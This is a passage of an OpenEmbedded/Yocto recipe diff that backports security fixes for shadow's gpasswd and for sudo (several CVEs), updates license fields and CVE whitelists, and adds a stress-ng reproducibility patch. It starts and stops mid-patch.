+is trivial, this fix should probably be applied soon, and backported to
+all supported distributions, to prevent someone else having more
+imagination than us to find a way.
+
+Affected versions
+~~~~~~~~~~~~~~~~~
+
+All. Bug introduced in shadow 19990709. That's the second commit in
+the git history.
+
+Fixes: 45c6603cc86c ("[svn-upgrade] Integrating new upstream version, shadow (19990709)")
+Reported-by: Alejandro Colomar <alx@kernel.org>
+Cc: Serge Hallyn <serge@hallyn.com>
+Cc: Iker Pedrosa <ipedrosa@redhat.com>
+Cc: Seth Arnold <seth.arnold@canonical.com>
+Cc: Christian Brauner <christian@brauner.io>
+Cc: Balint Reczey <rbalint@debian.org>
+Cc: Sam James <sam@gentoo.org>
+Cc: David Runge <dvzrv@archlinux.org>
+Cc: Andreas Jaeger <aj@suse.de>
+Cc: <~hallyn/shadow@lists.sr.ht>
+Signed-off-by: Alejandro Colomar <alx@kernel.org>
+Signed-off-by: Hugo SIMELIERE <hsimeliere.opensource@witekio.com>
+---
+ src/gpasswd.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/src/gpasswd.c b/src/gpasswd.c
+index 4d75af96..a698b32a 100644
+--- a/src/gpasswd.c
++++ b/src/gpasswd.c
+@@ -918,6 +918,7 @@ static void change_passwd (struct group *gr)
+ strzero (cp);
+ cp = getpass (_("Re-enter new password: "));
+ if (NULL == cp) {
++ memzero (pass, sizeof pass);
+ exit (1);
+ }
+
+--
+2.42.0
+
diff --git a/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb b/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb
index 5f7ea00bf1..4e68f826c6 100644
--- a/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb
+++ b/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb
@@ -2,7 +2,7 @@ SUMMARY = "Shadow utils requirements for useradd.bbclass"
HOMEPAGE = "http://github.com/shadow-maint/shadow"
BUGTRACKER = "http://github.com/shadow-maint/shadow/issues"
SECTION = "base utils"
-LICENSE = "BSD | Artistic-1.0"
+LICENSE = "BSD-3-Clause | Artistic-1.0"
LIC_FILES_CHKSUM = "file://login.defs_shadow-sysroot;md5=25e2f2de4dfc8f966ac5cdfce45cd7d5"
DEPENDS = "base-passwd"
diff --git a/meta/recipes-extended/shadow/shadow.inc b/meta/recipes-extended/shadow/shadow.inc
index f86e5e03c0..c16292c38a 100644
--- a/meta/recipes-extended/shadow/shadow.inc
+++ b/meta/recipes-extended/shadow/shadow.inc
@@ -1,8 +1,9 @@
SUMMARY = "Tools to change and administer password and group data"
HOMEPAGE = "http://github.com/shadow-maint/shadow"
+DESCRIPTION = "${SUMMARY}"
BUGTRACKER = "http://github.com/shadow-maint/shadow/issues"
SECTION = "base/utils"
-LICENSE = "BSD | Artistic-1.0"
+LICENSE = "BSD-3-Clause | Artistic-1.0"
LIC_FILES_CHKSUM = "file://COPYING;md5=ed80ff1c2b40843cf5768e5229cf16e5 \
file://src/passwd.c;beginline=2;endline=30;md5=5720ff729a6ff39ecc9f64555d75f4af"
@@ -13,6 +14,9 @@ SRC_URI = "https://github.com/shadow-maint/shadow/releases/download/${PV}/${BP}.
file://shadow-4.1.3-dots-in-usernames.patch \
${@bb.utils.contains('PACKAGECONFIG', 'pam', '${PAM_SRC_URI}', '', d)} \
file://shadow-relaxed-usernames.patch \
+ file://CVE-2023-29383.patch \
+ file://0001-Overhaul-valid_field.patch \
+ file://CVE-2023-4641.patch \
"
SRC_URI_append_class-target = " \
diff --git a/meta/recipes-extended/shadow/shadow_4.8.1.bb b/meta/recipes-extended/shadow/shadow_4.8.1.bb
index c975395ff8..9dfcd4bc10 100644
--- a/meta/recipes-extended/shadow/shadow_4.8.1.bb
+++ b/meta/recipes-extended/shadow/shadow_4.8.1.bb
@@ -6,5 +6,10 @@ BUILD_LDFLAGS_append_class-target = " ${@bb.utils.contains('DISTRO_FEATURES', 'p
BBCLASSEXTEND = "native nativesdk"
+# Severity is low and marked as closed and won't fix.
+# https://bugzilla.redhat.com/show_bug.cgi?id=884658
+CVE_CHECK_WHITELIST += "CVE-2013-4235"
+# This is an issue for a different shadow
+CVE_CHECK_WHITELIST += "CVE-2016-15024"
diff --git a/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch b/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch
new file mode 100644
index 0000000000..9dfca0441b
--- /dev/null
+++ b/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch
@@ -0,0 +1,26 @@
+From 2386cd8f907b379ae5cc1ce2888abef7d30e709a Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex@linutronix.de>
+Date: Sat, 23 Oct 2021 20:20:59 +0200
+Subject: [PATCH] Makefile: do not write the timestamp into compressed manpage.
+
+This helps reproducibility.
+
+Upstream-Status: Submitted [https://github.com/ColinIanKing/stress-ng/pull/156]
+Signed-off-by: Alexander Kanavin <alex@linutronix.de>
+---
+ Makefile | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/Makefile b/Makefile
+index 886018f9..f4290f9c 100644
+--- a/Makefile
++++ b/Makefile
+@@ -412,7 +412,7 @@ git-commit-id.h:
+ $(OBJS): stress-ng.h Makefile
+
+ stress-ng.1.gz: stress-ng.1
+- gzip -c $< > $@
++ gzip -n -c $< > $@
+
+ .PHONY: dist
+ dist:
diff --git a/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb b/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb
index 9b987c7bde..cf94e0275b 100644
--- a/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb
+++ b/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb
@@ -5,11 +5,12 @@ HOMEPAGE = "https://kernel.ubuntu.com/~cking/stress-ng/"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
-SRC_URI = "https://kernel.ubuntu.com/~cking/tarballs/${BPN}/${BP}.tar.xz \
+SRC_URI = "git://github.com/ColinIanKing/stress-ng.git;protocol=https;branch=master \
file://0001-Do-not-preserve-ownership-when-installing-example-jo.patch \
+ file://0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch \
"
-SRC_URI[md5sum] = "7b89157c838f2bb4bdeba8f46e3c56ae"
-SRC_URI[sha256sum] = "860291dd3a18b985b3483190a627bbede2b5c52113766c1921001b3fb4b83af0"
+SRCREV = "e045bcd711178c11b7e797ef6b4c524658468596"
+S = "${WORKDIR}/git"
DEPENDS = "coreutils-native"
diff --git a/meta/recipes-extended/sudo/files/CVE-2023-22809.patch b/meta/recipes-extended/sudo/files/CVE-2023-22809.patch
new file mode 100644
index 0000000000..6c47eb3e44
--- /dev/null
+++ b/meta/recipes-extended/sudo/files/CVE-2023-22809.patch
@@ -0,0 +1,113 @@
+Backport of:
+
+# HG changeset patch
+# Parent 7275148cad1f8cd3c350026460acc4d6ad349c3a
+sudoedit: do not permit editor arguments to include "--"
+We use "--" to separate the editor and arguments from the files to edit.
+If the editor arguments include "--", sudo can be tricked into allowing
+the user to edit a file not permitted by the security policy.
+Thanks to Matthieu Barjole and Victor Cutillas of Synacktiv
+(https://synacktiv.com) for finding this bug.
+
+CVE: CVE-2023-22809
+Upstream-Staus: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.8.31-1ubuntu1.4.debian.tar.xz]
+Signed-off-by: Omkar Patil <omkar.patil@kpit.com>
+
+--- a/plugins/sudoers/editor.c
++++ b/plugins/sudoers/editor.c
+@@ -56,7 +56,7 @@ resolve_editor(const char *ed, size_t ed
+ const char *cp, *ep, *tmp;
+ const char *edend = ed + edlen;
+ struct stat user_editor_sb;
+- int nargc;
++ int nargc = 0;
+ debug_decl(resolve_editor, SUDOERS_DEBUG_UTIL)
+
+ /*
+@@ -102,6 +102,21 @@ resolve_editor(const char *ed, size_t ed
+ free(editor_path);
+ while (nargc--)
+ free(nargv[nargc]);
++ free(nargv);
++ debug_return_str(NULL);
++ }
++
++ /*
++ * We use "--" to separate the editor and arguments from the files
++ * to edit. The editor arguments themselves may not contain "--".
++ */
++ if (strcmp(nargv[nargc], "--") == 0) {
++ sudo_warnx(U_("ignoring editor: %.*s"), (int)edlen, ed);
++ sudo_warnx("%s", U_("editor arguments may not contain \"--\""));
++ errno = EINVAL;
++ free(editor_path);
++ while (nargc--)
++ free(nargv[nargc]);
+ free(nargv);
+ debug_return_str(NULL);
+ }
+--- a/plugins/sudoers/sudoers.c
++++ b/plugins/sudoers/sudoers.c
+@@ -616,20 +616,31 @@ sudoers_policy_main(int argc, char * con
+
+ /* Note: must call audit before uid change. */
+ if (ISSET(sudo_mode, MODE_EDIT)) {
++ const char *env_editor = NULL;
+ int edit_argc;
+- const char *env_editor;
+
+ free(safe_cmnd);
+ safe_cmnd = find_editor(NewArgc - 1, NewArgv + 1, &edit_argc,
+ &edit_argv, NULL, &env_editor, false);
+ if (safe_cmnd == NULL) {
+- if (errno != ENOENT)
++ switch (errno) {
++ case ENOENT:
++ audit_failure(NewArgc, NewArgv, N_("%s: command not found"),
++ env_editor ? env_editor : def_editor);
++ sudo_warnx(U_("%s: command not found"),
++ env_editor ? env_editor : def_editor);
++ goto bad;
++ case EINVAL:
++ if (def_env_editor && env_editor != NULL) {
++ /* User tried to do something funny with the editor. */
++ log_warningx(SLOG_NO_STDERR|SLOG_SEND_MAIL,
++ "invalid user-specified editor: %s", env_editor);
++ goto bad;
++ }
++ /* FALLTHROUGH */
++ default:
+ goto done;
+- audit_failure(NewArgc, NewArgv, N_("%s: command not found"),
+- env_editor ? env_editor : def_editor);
+- sudo_warnx(U_("%s: command not found"),
+- env_editor ? env_editor : def_editor);
+- goto bad;
++ }
+ }
+ if (audit_success(edit_argc, edit_argv) != 0 && !def_ignore_audit_errors)
+ goto done;
+--- a/plugins/sudoers/visudo.c
++++ b/plugins/sudoers/visudo.c
+@@ -308,7 +308,7 @@ static char *
+ get_editor(int *editor_argc, char ***editor_argv)
+ {
+ char *editor_path = NULL, **whitelist = NULL;
+- const char *env_editor;
++ const char *env_editor = NULL;
+ static char *files[] = { "+1", "sudoers" };
+ unsigned int whitelist_len = 0;
+ debug_decl(get_editor, SUDOERS_DEBUG_UTIL)
+@@ -342,7 +342,11 @@ get_editor(int *editor_argc, char ***edi
+ if (editor_path == NULL) {
+ if (def_env_editor && env_editor != NULL) {
+ /* We are honoring $EDITOR so this is a fatal error. */
+- sudo_fatalx(U_("specified editor (%s) doesn't exist"), env_editor);
++ if (errno == ENOENT) {
++ sudo_warnx(U_("specified editor (%s) doesn't exist"),
++ env_editor);
++ }
++ exit(EXIT_FAILURE);
+ }
+ sudo_fatalx(U_("no editor found (editor path = %s)"), def_editor);
+ }
diff --git a/meta/recipes-extended/sudo/sudo.inc b/meta/recipes-extended/sudo/sudo.inc
index 5d27d46928..9c7279d25a 100644
--- a/meta/recipes-extended/sudo/sudo.inc
+++ b/meta/recipes-extended/sudo/sudo.inc
@@ -3,8 +3,8 @@ DESCRIPTION = "Sudo (superuser do) allows a system administrator to give certain
HOMEPAGE = "http://www.sudo.ws"
BUGTRACKER = "http://www.sudo.ws/bugs/"
SECTION = "admin"
-LICENSE = "ISC & BSD & Zlib"
-LIC_FILES_CHKSUM = "file://doc/LICENSE;md5=4d1b44b1576eea036d78b8cc961aa93d \
+LICENSE = "ISC & BSD-3-Clause & BSD-2-Clause & Zlib"
+LIC_FILES_CHKSUM = "file://doc/LICENSE;md5=07966675feaddba70cc812895b248230 \
file://plugins/sudoers/redblack.c;beginline=1;endline=46;md5=03e35317699ba00b496251e0dfe9f109 \
file://lib/util/reallocarray.c;beginline=3;endline=15;md5=397dd45c7683e90b9f8bf24638cf03bf \
file://lib/util/fnmatch.c;beginline=3;endline=27;md5=004d7d2866ba1f5b41174906849d2e0f \
@@ -49,3 +49,5 @@ do_compile_prepend () {
do_install_prepend (){
mkdir -p ${D}/${localstatedir}/lib
}
+
+CVE_VERSION_SUFFIX = "patch"
diff --git a/meta/recipes-extended/sudo/sudo/0001-Fix-includes-when-building-with-musl.patch b/meta/recipes-extended/sudo/sudo/0001-Fix-includes-when-building-with-musl.patch
new file mode 100644
index 0000000000..6ee2d5c11e
--- /dev/null
+++ b/meta/recipes-extended/sudo/sudo/0001-Fix-includes-when-building-with-musl.patch
@@ -0,0 +1,29 @@
+From f4e9e4337f8844d199515ff2b762c914dd254cbd Mon Sep 17 00:00:00 2001
+From: Dan Robertson <dan@dlrobertson.com>
+Date: Sat, 16 May 2020 00:12:44 +0000
+Subject: [PATCH] Fix includes when building with musl
+
+Include sys/types.h for mode_t and id_t in sudo_debug.h
+
+Upstream-Status: Backport [https://github.com/sudo-project/sudo/commit/f4e9e4337f8844d199515ff2b762c914dd254cbd]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ include/sudo_debug.h | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/include/sudo_debug.h b/include/sudo_debug.h
+index 180f2096f..0124b0b19 100644
+--- a/include/sudo_debug.h
++++ b/include/sudo_debug.h
+@@ -25,6 +25,7 @@
+ #else
+ # include "compat/stdbool.h"
+ #endif
++#include <sys/types.h>
+ #include "sudo_queue.h"
+
+ /*
+--
+2.25.1
+
diff --git a/meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch b/meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch
new file mode 100644
index 0000000000..1336c7701d
--- /dev/null
+++ b/meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch
@@ -0,0 +1,59 @@
+From e1554d7996a59bf69544f3d8dd4ae683027948f9 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 15 Nov 2022 09:17:18 +0530
+Subject: [PATCH] CVE-2022-43995
+
+Upstream-Status: Backport [https://github.com/sudo-project/sudo/commit/bd209b9f16fcd1270c13db27ae3329c677d48050]
+CVE: CVE-2022-43995
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+Potential heap overflow for passwords < 8
+characters. Starting with sudo 1.8.0 the plaintext password buffer is
+dynamically sized so it is not safe to assume that it is at least 9 bytes in
+size.
+Found by Hugo Lefeuvre (University of Manchester) with ConfFuzz.
+---
+ plugins/sudoers/auth/passwd.c | 11 +++++------
+ 1 file changed, 5 insertions(+), 6 deletions(-)
+
+diff --git a/plugins/sudoers/auth/passwd.c b/plugins/sudoers/auth/passwd.c
+index 03c7a16..76a7824 100644
+--- a/plugins/sudoers/auth/passwd.c
++++ b/plugins/sudoers/auth/passwd.c
+@@ -63,7 +63,7 @@ sudo_passwd_init(struct passwd *pw, sudo_auth *auth)
+ int
+ sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_conv_callback *callback)
+ {
+- char sav, *epass;
++ char des_pass[9], *epass;
+ char *pw_epasswd = auth->data;
+ size_t pw_len;
+ int matched = 0;
+@@ -75,12 +75,12 @@ sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_c
+
+ /*
+ * Truncate to 8 chars if standard DES since not all crypt()'s do this.
+- * If this turns out not to be safe we will have to use OS #ifdef's (sigh).
+ */
+- sav = pass[8];
+ pw_len = strlen(pw_epasswd);
+- if (pw_len == DESLEN || HAS_AGEINFO(pw_epasswd, pw_len))
+- pass[8] = '\0';
++ if (pw_len == DESLEN || HAS_AGEINFO(pw_epasswd, pw_len)) {
++ strlcpy(des_pass, pass, sizeof(des_pass));
++ pass = des_pass;
++ }
+
+ /*
+ * Normal UN*X password check.
+@@ -88,7 +88,6 @@ sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_c
+ * only compare the first DESLEN characters in that case.
+ */
+ epass = (char *) crypt(pass, pw_epasswd);
+- pass[8] = sav;
+ if (epass != NULL) {
+ if (HAS_AGEINFO(pw_epasswd, pw_len) && strlen(epass) == DESLEN)
+ matched = !strncmp(pw_epasswd, epass, DESLEN);
+--
+2.25.1
+
diff --git a/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch
new file mode 100644
index 0000000000..bc6f8c19a6
--- /dev/null
+++ b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch
@@ -0,0 +1,646 @@
+Origin: Backport obtained from SUSE. Thanks!
+
+From 334daf92b31b79ce68ed75e2ee14fca265f029ca Mon Sep 17 00:00:00 2001
+From: "Todd C. Miller" <Todd.Miller@sudo.ws>
+Date: Wed, 18 Jan 2023 08:21:34 -0700
+Subject: [PATCH] Escape control characters in log messages and "sudoreplay -l"
+ output. The log message contains user-controlled strings that could include
+ things like terminal control characters. Space characters in the command
+ path are now also escaped.
+
+Command line arguments that contain spaces are surrounded with
+single quotes and any literal single quote or backslash characters
+are escaped with a backslash. This makes it possible to distinguish
+multiple command line arguments from a single argument that contains
+spaces.
+
+Issue found by Matthieu Barjole and Victor Cutillas of Synacktiv
+(https://synacktiv.com).
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/sudo/tree/debian/patches/CVE-2023-2848x-1.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/sudo-project/sudo/commit/334daf92b31b79ce68ed75e2ee14fca265f029ca]
+CVE: CVE-2023-28486 CVE-2023-28487
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ doc/sudoers.man.in | 33 +++++++--
+ doc/sudoers.mdoc.in | 28 ++++++--
+ doc/sudoreplay.man.in | 9 ++
+ doc/sudoreplay.mdoc.in | 10 ++
+ include/sudo_compat.h | 6 +
+ include/sudo_lbuf.h | 7 ++
+ lib/util/lbuf.c | 106 +++++++++++++++++++++++++++++++
+ lib/util/util.exp.in | 1
+ plugins/sudoers/logging.c | 145 +++++++++++--------------------------------
+ plugins/sudoers/sudoreplay.c | 44 +++++++++----
+ 10 files changed, 257 insertions(+), 132 deletions(-)
+
+--- a/doc/sudoers.man.in
++++ b/doc/sudoers.man.in
+@@ -4566,6 +4566,19 @@ can log events using either
+ syslog(3)
+ or a simple log file.
+ The log format is almost identical in both cases.
++Any control characters present in the log data are formatted in octal
++with a leading
++\(oq#\(cq
++character.
++For example, a horizontal tab is stored as
++\(oq#011\(cq
++and an embedded carriage return is stored as
++\(oq#015\(cq.
++In addition, space characters in the command path are stored as
++\(oq#040\(cq.
++Literal single quotes and backslash characters
++(\(oq\e\(cq)
++in command line arguments are escaped with a backslash.
+ .SS "Accepted command log entries"
+ Commands that sudo runs are logged using the following format (split
+ into multiple lines for readability):
+@@ -4646,7 +4659,7 @@ A list of environment variables specifie
+ if specified.
+ .TP 14n
+ command
+-The actual command that was executed.
++The actual command that was executed, including any command line arguments.
+ .PP
+ Messages are logged using the locale specified by
+ \fIsudoers_locale\fR,
+@@ -4882,17 +4895,21 @@ with a few important differences:
+ 1.\&
+ The
+ \fIprogname\fR
+-and
+-\fIhostname\fR
+-fields are not present.
++field is not present.
+ .TP 5n
+ 2.\&
+-If the
+-\fIlog_year\fR
+-option is enabled,
+-the date will also include the year.
++The
++\fIhostname\fR
++is only logged if the
++\fIlog_host\fR
++option is enabled.
+ .TP 5n
+ 3.\&
++The date does not include the year unless the
++\fIlog_year\fR
++option is enabled.
++.TP 5n
++4.\&
+ Lines that are longer than
+ \fIloglinelen\fR
+ characters (80 by default) are word-wrapped and continued on the
+--- a/doc/sudoers.mdoc.in
++++ b/doc/sudoers.mdoc.in
+@@ -4261,6 +4261,19 @@ can log events using either
+ .Xr syslog 3
+ or a simple log file.
+ The log format is almost identical in both cases.
++Any control characters present in the log data are formatted in octal
++with a leading
++.Ql #
++character.
++For example, a horizontal tab is stored as
++.Ql #011
++and an embedded carriage return is stored as
++.Ql #015 .
++In addition, space characters in the command path are stored as
++.Ql #040 .
++Literal single quotes and backslash characters
++.Pq Ql \e
++in command line arguments are escaped with a backslash.
+ .Ss Accepted command log entries
+ Commands that sudo runs are logged using the following format (split
+ into multiple lines for readability):
+@@ -4328,7 +4341,7 @@ option is enabled.
+ A list of environment variables specified on the command line,
+ if specified.
+ .It command
+-The actual command that was executed.
++The actual command that was executed, including any command line arguments.
+ .El
+ .Pp
+ Messages are logged using the locale specified by
+@@ -4550,14 +4563,17 @@ with a few important differences:
+ .It
+ The
+ .Em progname
+-and
++field is not present.
++.It
++The
+ .Em hostname
+-fields are not present.
++is only logged if the
++.Em log_host
++option is enabled.
+ .It
+-If the
++The date does not include the year unless the
+ .Em log_year
+-option is enabled,
+-the date will also include the year.
++option is enabled.
+ .It
+ Lines that are longer than
+ .Em loglinelen
+--- a/doc/sudoreplay.man.in
++++ b/doc/sudoreplay.man.in
+@@ -149,6 +149,15 @@ In this mode,
+ will list available sessions in a format similar to the
+ \fBsudo\fR
+ log file format, sorted by file name (or sequence number).
++Any control characters present in the log data are formated in octal
++with a leading
++\(oq#\(cq
++character.
++For example, a horizontal tab is displayed as
++\(oq#011\(cq
++and an embedded carriage return is displayed as
++\(oq#015\(cq.
++.sp
+ If a
+ \fIsearch expression\fR
+ is specified, it will be used to restrict the IDs that are displayed.
+--- a/doc/sudoreplay.mdoc.in
++++ b/doc/sudoreplay.mdoc.in
+@@ -142,6 +142,16 @@ In this mode,
+ will list available sessions in a format similar to the
+ .Nm sudo
+ log file format, sorted by file name (or sequence number).
++Any control characters present in the log data are formatted in octal
++with a leading
++.Ql #
++character.
++For example, a horizontal tab is displayed as
++.Ql #011
++and an embedded carriage return is displayed as
++.Ql #015 .
++Space characters in the command name and arguments are also formatted in octal.
++.Pp
+ If a
+ .Ar search expression
+ is specified, it will be used to restrict the IDs that are displayed.
+--- a/include/sudo_compat.h
++++ b/include/sudo_compat.h
+@@ -79,6 +79,12 @@
+ # endif
+ #endif
+
++#ifdef HAVE_FALLTHROUGH_ATTRIBUTE
++# define FALLTHROUGH __attribute__((__fallthrough__))
++#else
++# define FALLTHROUGH do { } while (0)
++#endif
++
+ /*
+ * Given the pointer x to the member m of the struct s, return
+ * a pointer to the containing structure.
+--- a/include/sudo_lbuf.h
++++ b/include/sudo_lbuf.h
+@@ -36,9 +36,15 @@ struct sudo_lbuf {
+
+ typedef int (*sudo_lbuf_output_t)(const char *);
+
++/* Flags for sudo_lbuf_append_esc() */
++#define LBUF_ESC_CNTRL 0x01
++#define LBUF_ESC_BLANK 0x02
++#define LBUF_ESC_QUOTE 0x04
++
+ __dso_public void sudo_lbuf_init_v1(struct sudo_lbuf *lbuf, sudo_lbuf_output_t output, int indent, const char *continuation, int cols);
+ __dso_public void sudo_lbuf_destroy_v1(struct sudo_lbuf *lbuf);
+ __dso_public bool sudo_lbuf_append_v1(struct sudo_lbuf *lbuf, const char *fmt, ...) __printflike(2, 3);
++__dso_public bool sudo_lbuf_append_esc_v1(struct sudo_lbuf *lbuf, int flags, const char *fmt, ...) __printflike(3, 4);
+ __dso_public bool sudo_lbuf_append_quoted_v1(struct sudo_lbuf *lbuf, const char *set, const char *fmt, ...) __printflike(3, 4);
+ __dso_public void sudo_lbuf_print_v1(struct sudo_lbuf *lbuf);
+ __dso_public bool sudo_lbuf_error_v1(struct sudo_lbuf *lbuf);
+@@ -47,6 +53,7 @@ __dso_public void sudo_lbuf_clearerr_v1(
+ #define sudo_lbuf_init(_a, _b, _c, _d, _e) sudo_lbuf_init_v1((_a), (_b), (_c), (_d), (_e))
+ #define sudo_lbuf_destroy(_a) sudo_lbuf_destroy_v1((_a))
+ #define sudo_lbuf_append sudo_lbuf_append_v1
++#define sudo_lbuf_append_esc sudo_lbuf_append_esc_v1
+ #define sudo_lbuf_append_quoted sudo_lbuf_append_quoted_v1
+ #define sudo_lbuf_print(_a) sudo_lbuf_print_v1((_a))
+ #define sudo_lbuf_error(_a) sudo_lbuf_error_v1((_a))
+--- a/lib/util/lbuf.c
++++ b/lib/util/lbuf.c
+@@ -93,6 +93,112 @@ sudo_lbuf_expand(struct sudo_lbuf *lbuf,
+ }
+
+ /*
++ * Escape a character in octal form (#0n) and store it as a string
++ * in buf, which must have at least 6 bytes available.
++ * Returns the length of buf, not counting the terminating NUL byte.
++ */
++static int
++escape(unsigned char ch, char *buf)
++{
++ const int len = ch < 0100 ? (ch < 010 ? 3 : 4) : 5;
++
++ /* Work backwards from the least significant digit to most significant. */
++ switch (len) {
++ case 5:
++ buf[4] = (ch & 7) + '0';
++ ch >>= 3;
++ FALLTHROUGH;
++ case 4:
++ buf[3] = (ch & 7) + '0';
++ ch >>= 3;
++ FALLTHROUGH;
++ case 3:
++ buf[2] = (ch & 7) + '0';
++ buf[1] = '0';
++ buf[0] = '#';
++ break;
++ }
++ buf[len] = '\0';
++
++ return len;
++}
++
++/*
++ * Parse the format and append strings, only %s and %% escapes are supported.
++ * Any non-printable characters are escaped in octal as #0nn.
++ */
++bool
++sudo_lbuf_append_esc_v1(struct sudo_lbuf *lbuf, int flags, const char *fmt, ...)
++{
++ unsigned int saved_len = lbuf->len;
++ bool ret = false;
++ const char *s;
++ va_list ap;
++ debug_decl(sudo_lbuf_append_esc, SUDO_DEBUG_UTIL);
++
++ if (sudo_lbuf_error(lbuf))
++ debug_return_bool(false);
++
++#define should_escape(ch) \
++ ((ISSET(flags, LBUF_ESC_CNTRL) && iscntrl((unsigned char)ch)) || \
++ (ISSET(flags, LBUF_ESC_BLANK) && isblank((unsigned char)ch)))
++#define should_quote(ch) \
++ (ISSET(flags, LBUF_ESC_QUOTE) && (ch == '\'' || ch == '\\'))
++
++ va_start(ap, fmt);
++ while (*fmt != '\0') {
++ if (fmt[0] == '%' && fmt[1] == 's') {
++ if ((s = va_arg(ap, char *)) == NULL)
++ s = "(NULL)";
++ while (*s != '\0') {
++ if (should_escape(*s)) {
++ if (!sudo_lbuf_expand(lbuf, sizeof("#0177") - 1))
++ goto done;
++ lbuf->len += escape(*s++, lbuf->buf + lbuf->len);
++ continue;
++ }
++ if (should_quote(*s)) {
++ if (!sudo_lbuf_expand(lbuf, 2))
++ goto done;
++ lbuf->buf[lbuf->len++] = '\\';
++ lbuf->buf[lbuf->len++] = *s++;
++ continue;
++ }
++ if (!sudo_lbuf_expand(lbuf, 1))
++ goto done;
++ lbuf->buf[lbuf->len++] = *s++;
++ }
++ fmt += 2;
++ continue;
++ }
++ if (should_escape(*fmt)) {
++ if (!sudo_lbuf_expand(lbuf, sizeof("#0177") - 1))
++ goto done;
++ if (*fmt == '\'') {
++ lbuf->buf[lbuf->len++] = '\\';
++ lbuf->buf[lbuf->len++] = *fmt++;
++ } else {
++ lbuf->len += escape(*fmt++, lbuf->buf + lbuf->len);
++ }
++ continue;
++ }
++ if (!sudo_lbuf_expand(lbuf, 1))
++ goto done;
++ lbuf->buf[lbuf->len++] = *fmt++;
++ }
++ ret = true;
++
++done:
++ if (!ret)
++ lbuf->len = saved_len;
++ if (lbuf->size != 0)
++ lbuf->buf[lbuf->len] = '\0';
++ va_end(ap);
++
++ debug_return_bool(ret);
++}
++
++/*
+ * Parse the format and append strings, only %s and %% escapes are supported.
+ * Any characters in set are quoted with a backslash.
+ */
+--- a/lib/util/util.exp.in
++++ b/lib/util/util.exp.in
+@@ -79,6 +79,7 @@ sudo_gethostname_v1
+ sudo_gettime_awake_v1
+ sudo_gettime_mono_v1
+ sudo_gettime_real_v1
++sudo_lbuf_append_esc_v1
+ sudo_lbuf_append_quoted_v1
+ sudo_lbuf_append_v1
+ sudo_lbuf_clearerr_v1
+--- a/plugins/sudoers/logging.c
++++ b/plugins/sudoers/logging.c
+@@ -58,6 +58,7 @@
+ #include <syslog.h>
+
+ #include "sudoers.h"
++#include "sudo_lbuf.h"
+
+ #ifndef HAVE_GETADDRINFO
+ # include "compat/getaddrinfo.h"
+@@ -940,14 +941,6 @@ should_mail(int status)
+ (def_mail_no_perms && !ISSET(status, VALIDATE_SUCCESS)));
+ }
+
+-#define LL_TTY_STR "TTY="
+-#define LL_CWD_STR "PWD=" /* XXX - should be CWD= */
+-#define LL_USER_STR "USER="
+-#define LL_GROUP_STR "GROUP="
+-#define LL_ENV_STR "ENV="
+-#define LL_CMND_STR "COMMAND="
+-#define LL_TSID_STR "TSID="
+-
+ #define IS_SESSID(s) ( \
+ isalnum((unsigned char)(s)[0]) && isalnum((unsigned char)(s)[1]) && \
+ (s)[2] == '/' && \
+@@ -962,14 +955,16 @@ should_mail(int status)
+ static char *
+ new_logline(const char *message, const char *errstr)
+ {
+- char *line = NULL, *evstr = NULL;
+ #ifndef SUDOERS_NO_SEQ
+ char sessid[7];
+ #endif
+ const char *tsid = NULL;
+- size_t len = 0;
++ struct sudo_lbuf lbuf;
++ int i;
+ debug_decl(new_logline, SUDOERS_DEBUG_LOGGING)
+
++ sudo_lbuf_init(&lbuf, NULL, 0, NULL, 0);
++
+ #ifndef SUDOERS_NO_SEQ
+ /* A TSID may be a sudoers-style session ID or a free-form string. */
+ if (sudo_user.iolog_file != NULL) {
+@@ -989,119 +984,55 @@ new_logline(const char *message, const c
+ #endif
+
+ /*
+- * Compute line length
++ * Format the log line as an lbuf, escaping control characters in
++ * octal form (#0nn). Error checking (ENOMEM) is done at the end.
+ */
+- if (message != NULL)
+- len += strlen(message) + 3;
+- if (errstr != NULL)
+- len += strlen(errstr) + 3;
+- len += sizeof(LL_TTY_STR) + 2 + strlen(user_tty);
+- len += sizeof(LL_CWD_STR) + 2 + strlen(user_cwd);
+- if (runas_pw != NULL)
+- len += sizeof(LL_USER_STR) + 2 + strlen(runas_pw->pw_name);
+- if (runas_gr != NULL)
